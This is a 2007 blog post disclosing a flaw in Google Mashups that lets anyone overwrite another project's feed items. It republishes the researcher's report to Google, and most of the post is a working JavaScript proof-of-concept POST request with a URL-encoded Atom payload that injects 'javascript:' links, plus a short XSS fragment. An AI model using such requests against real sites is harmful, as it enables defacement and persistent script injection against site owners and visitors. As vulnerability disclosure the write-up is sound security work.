Friday, September 28, 2007

Google Mashups Vulnerability

yay, I wanted to be part of this hell of a week (Google's Dark Week).

Here is the vulnerability I reported to google, and it appears to be a "design error" (and there is no fix, without breaking other things).

With this vulnerability you can "deface" any google-mashups project, creating your own XML-RPC to the GWT server, and change the contents of any feed.

The report I sent to Google is this:






Supose, you are the creator of http://gallery.googlemashups.com/
if you include a list, for a local feed, then any attacker from the world will be able to modify all the content in your website.

This is maybe a design error, and as I see it, it's pretty dificult to fix.

I've made a demonstration to http://gallery.googlemashups.com/
Enter to the website, and go to the last page, there you will see that the last item was modified.

to do so, you just need to execute the following code:


with(new XMLHttpRequest()){
open("POST","http://gallery.googlemashups.com/feeds/app/galleryApps",true);
setRequestHeader("Content-Type","application/atom+xml; charset=utf-8");
setRequestHeader("X-Gm-Validate","ASDFGHJKLÑPQWERRTYUIOPZXCVBNMUJHFDDDEFFDSSCFGGTFDQWERTYUIYTRREWWWQQ");
setRequestHeader("X-GData-Client","JavaScript-V1.0-Google Mashup Editor");
send(unescape("%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%20%65%6e%63%6f%64%69%6e%67%3d%22%55%54%46%2d%38%22%20%3f%3e%0d%0a%3c%61%74%6f%6d%3a%65%6e%74%72%79%20%78%6d%6c%6e%73%3a%67%6d%64%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6d%64%2f%32%30%30%37%22%20%67%3d%22%63%6f%6d%2e%67%6f%6f%67%6c%65%2e%67%77%74%2e%63%6f%72%65%2e%63%6c%69%65%6e%74%2e%4a%61%76%61%53%63%72%69%70%74%4f%62%6a%65%63%74%22%20%78%6d%6c%6e%73%3a%61%74%6f%6d%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%35%2f%41%74%6f%6d%22%20%78%6d%6c%6e%73%3a%67%64%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%2f%32%30%30%35%22%20%78%6d%6c%6e%73%3a%67%6d%3d%22%68%74%74%70%3a%2f%2f%62%61%73%65%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%73%2d%6d%65%74%61%64%61%74%61%2f%31%2e%30%22%20%78%6d%6c%6e%73%3a%67%3d%22%68%74%74%70%3a%2f%2f%62%61%73%65%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%73%2f%31%2e%30%22%20%78%6d%6c%6e%73%3a%67%43%61%6c%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%43%61%6c%2f%32%30%30%35%22%20%78%6d%6c%6e%73%3a%73%74%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%74%2f%32%30%30%36%22%20%78%6d%6c%6e%73%3a%61%70%70%73%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%70%70%73%2f%32%30%30%36%22%20%78%6d%6c%6e%73%3a%78%73%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%31%39%39%39%2f%58%53%4c%2f%54%72%61%6e%73%66%6f%72%6d%22%20%78%6d%6c%6e%73%3a%78%68%74%6d%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%31%39%39%39%2f%78%68%74%6d%6c%22%20%78%6d%6c%6e%73%3a%6f%70%65%6e%53%65%61%72%63%68%3d%22%68%74%74%70%3a%2f%2f%61%39%2e%63%6f%6d%2f%2d%2f%73%70%65%63%2f%6f%70%65%6e%73%65%61%72%63%68%72%73%73%2f%31%2e%30%2f%22%20%78%6d%6c%6e%73%3a%6d%65%64%69%61%3d%22%68%74%74%70%3a%2f%2f%73%65%61%72%63%68%2e%79%61%68%6f%6f%2e%63%6f%6d%2f%6d%72%73%73%22%20%78%6d%6c%6e%73%3a%67%65%6f%72%73%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%65%6f%72%73%73%2e%6f%72%67%2f%67%65%6f%72%73%73%3d%67%65%6f%72%73%73%22%20%78%6d%6c%6e%73%3a%67%6d%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%6f%70%65%6e%67%69%73%2e%6e%65%74%2f%67%6d%6c%3d%67%6d%6c%22%20%78%6d%6c%6e%73%3a%65%78%69%66%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%70%68%6f%74%6f%73%2f%65%78%69%66%2f%32%30%30%37%3d%65%78%69%66%22%20%78%6d%6c%6e%73%3a%67%6d%73%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6d%73%2f%32%30%30%37%22%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%35%2f%41%74%6f%6d%22%3e%0d%0a%3c%69%64%3e%68%74%74%70%3a%2f%2f%67%61%6c%6c%65%72%79%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%3c%2f%69%64%3e%0d%0a%3c%70%75%62%6c%69%73%68%65%64%3e%32%30%30%37%2d%30%39%2d%30%38%54%30%30%3a%31%39%3a%34%38%2e%36%32%35%5a%3c%2f%70%75%62%6c%69%73%68%65%64%3e%0d%0a%3c%75%70%64%61%74%65%64%3e%32%30%30%37%2d%30%39%2d%30%38%54%30%30%3a%31%39%3a%34%38%2e%36%32%35%5a%3c%2f%75%70%64%61%74%65%64%3e%0d%0a%3c%74%69%74%6c%65%20%74%79%70%65%3d%22%74%65%78%74%22%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%21%21%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%63%6f%6e%74%65%6e%74%20%74%79%70%65%3d%22%74%65%78%74%22%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%21%3c%2f%63%6f%6e%74%65%6e%74%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%73%65%6c%66%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%61%74%6f%6d%20%78%6d%6c%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%2e%31%2e%74%65%73%74%2d%63%32%62%61%34%61%39%39%36%35%35%36%39%31%65%61%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%22%2f%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%65%64%69%74%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%61%74%6f%6d%20%78%6d%6c%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%2e%31%2e%74%65%73%74%2d%63%32%62%61%34%61%39%39%36%35%35%36%39%31%65%61%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%2f%30%22%2f%3e%0d%0a%3c%67%64%3a%61%70%70%4c%69%6e%6b%3e%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%27%47%6f%6f%67%6c%65%4d%61%73%68%75%70%73%20%64%65%73%69%67%6e%20%65%72%72%6f%72%3f%27%29%3b%3c%2f%67%64%3a%61%70%70%4c%69%6e%6b%3e%0d%0a%3c%67%64%3a%69%6d%67%55%52%4c%3e%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%27%47%6f%6f%67%6c%65%4d%61%73%68%75%70%73%20%64%65%73%69%67%6e%20%65%72%72%6f%72%3f%27%29%3b%3c%2f%67%64%3a%69%6d%67%55%52%4c%3e%0d%0a%3c%67%6d%64%3a%61%75%74%68%6f%72%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%3c%2f%67%6d%64%3a%61%75%74%68%6f%72%3e%0d%0a%3c%2f%61%74%6f%6d%3a%65%6e%74%72%79%3e"));
onreadystatechange=function(){
if(readyState==4){
alert(responseText);
}
}
}


you can get the X-Gm-Validate token, by sniffing your connection, the modification of the feeds, doesnt require validation of any type.

Well, that's the first part..
with this information you can modify the content of any item on the feed, but that's not all.
the information passed are not validated at all! so by means of..
link=blah">XSS

I could do a persistent XSS attack, this could completely destroy the project, make a deface or anything.

If you need me to explain further please tell me.





Well, actually there's also another XSS vulnerability in some other services, anyway, they are on their way of fixing them.. so I won't disclose them here (yet).